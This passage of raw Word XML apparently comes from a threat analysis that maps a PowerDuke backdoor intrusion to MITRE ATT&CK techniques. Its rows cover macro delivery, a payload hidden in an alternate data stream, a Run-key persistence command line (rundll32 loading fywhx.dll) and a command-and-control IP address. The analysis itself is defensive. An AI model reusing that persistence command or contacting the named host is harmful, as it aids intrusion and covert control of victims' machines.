          <w:p w14:paraId="77BF7F29" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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75" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="087E2CAD" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B84A829" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B341964" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78BEEBC3" w14:textId="240FD2A3" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F67A142" w14:textId="53985BBA" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00C80BA3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/</w:t>
            </w:r>
            <w:r w:rsidR="00B043E3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>N</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>P-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55A23FE9" w14:textId="64CD4BAF" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00CB60EA" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidR="0022561D" w:rsidRPr="00CB60EA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">User executes HTML malicious </w:t>
            </w:r>
            <w:r w:rsidR="005C6AF2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Word Macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009F42AF" w:rsidRPr="005B3D45" w14:paraId="676EF0DA" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A22161C" w14:textId="61F2585C" w:rsidR="009F42AF" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B722A9" w14:textId="6C07BAA1" w:rsidR="009F42AF" w:rsidRDefault="009A36D0" w:rsidP="00D23EEA">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w:t>
            </w:r>
            <w:r w:rsidR="00C81B62">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="000B2258">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">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375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54B99C36" w14:textId="5B9138FC" w:rsidR="009F42AF" w:rsidRPr="009F42AF" w:rsidRDefault="009A36D0" w:rsidP="00D23EEA">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1207 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009A36D0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FAAB641" w14:textId="1C328ACC" w:rsidR="009F42AF" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="031ED85F" w14:textId="77777777" w:rsidR="009F42AF" w:rsidRPr="005B3D45" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="515F789F" w14:textId="5A03627D" w:rsidR="009F42AF" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56A349DF" w14:textId="5124F609" w:rsidR="009F42AF" w:rsidRPr="005B3D45" w:rsidRDefault="00C80BA3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="498823BE" w14:textId="77777777" w:rsidR="009F42AF" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Alternate data stream (ADS) PNG file with the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PowerDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> backdoor component hidden and encrypted within using Tiny Encryption Algorithm (TEA).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5155E63F" w14:textId="202A7299" w:rsidR="009F42AF" w:rsidRPr="009F42AF" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:hyperlink r:id="rId64" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>NTFS Alternate Data Streams: The Good and the Bad (foldersecurityviewer.com)</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> )</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6AF2" w:rsidRPr="005B3D45" w14:paraId="5B4C733D" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4991A97B" w14:textId="670093CA" w:rsidR="005C6AF2" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741F9F6F" w14:textId="5FEE86C0" w:rsidR="005C6AF2" w:rsidRPr="005B3D45" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">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2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C3457A9" w14:textId="0422D0DC" w:rsidR="005C6AF2" w:rsidRPr="005B3D45" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1547.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Execution&gt;:Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F13F5C9" w14:textId="5CB4706E" w:rsidR="005C6AF2" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC928EA" w14:textId="77777777" w:rsidR="005C6AF2" w:rsidRPr="005B3D45" w:rsidRDefault="005C6AF2" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F336D74" w14:textId="114A0F65" w:rsidR="005C6AF2" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62FAC9D0" w14:textId="12B40141" w:rsidR="005C6AF2" w:rsidRPr="005B3D45" w:rsidRDefault="00C80BA3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1D2620" w14:textId="35DBA3DE" w:rsidR="005C6AF2" w:rsidRPr="005B3D45" w:rsidRDefault="009F42AF" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PowerDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> backdoor file dropped to </w:t>
            </w:r>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>"%APPDATA\Roaming\HP\" with persistence via HKCU Run Key "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>ToolboxFX</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009F42AF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>" (rundll32.exe %APPDATA\Roaming\HP\fywhx.dll #2). Connects directly to 185.132.124.43:443 for command and control.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="005B3D45" w14:paraId="00B00E86" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79125DD8" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50A72AE4" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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75" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38255DBF" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C8A37F7" w14:textId="1E1B57AB" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D91AE76" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48DEB364" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2294EAF5" w14:textId="0CFD7ADD" w:rsidR="0022561D" w:rsidRPr="005B3D45" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F96D56B" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="00770F7C" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidRPr="00770F7C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">6] See above </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PowerDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> Backdoor</w:t>
            </w:r>
            <w:r w:rsidR="0022561D" w:rsidRPr="00770F7C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> begins communication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="788CBD0F" w14:textId="77777777" w:rsidR="00D400A7" w:rsidRDefault="00D400A7" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="07949A88" w14:textId="77777777" w:rsidR="00AF7756" w:rsidRDefault="00D400A7" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Limited info on C&amp;C approach but from [7] </w:t>
            </w:r>
            <w:r w:rsidR="00AF7756">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4606747F" w14:textId="62162BA1" w:rsidR="00D400A7" w:rsidRPr="00D400A7" w:rsidRDefault="00AF7756" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF7756">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>The malware attempts to blend in with normal network traffic as much as possible. This is done with a handful of different tactics. Communication is often done with the HTTP protocol. Some of the malware will attempt to use realistic looking User-Agent strings with the requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E001C" w:rsidRPr="00B857D7" w14:paraId="644D623B" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D29CABF" w14:textId="30639C1D" w:rsidR="007E001C" w:rsidRDefault="00506CA4" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4753F7B3" w14:textId="7D6017A0" w:rsidR="007E001C" w:rsidRPr="00B857D7" w:rsidRDefault="007E001C" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00C81B62">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B526C35" w14:textId="5893A085" w:rsidR="007E001C" w:rsidRPr="00B857D7" w:rsidRDefault="007E001C" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
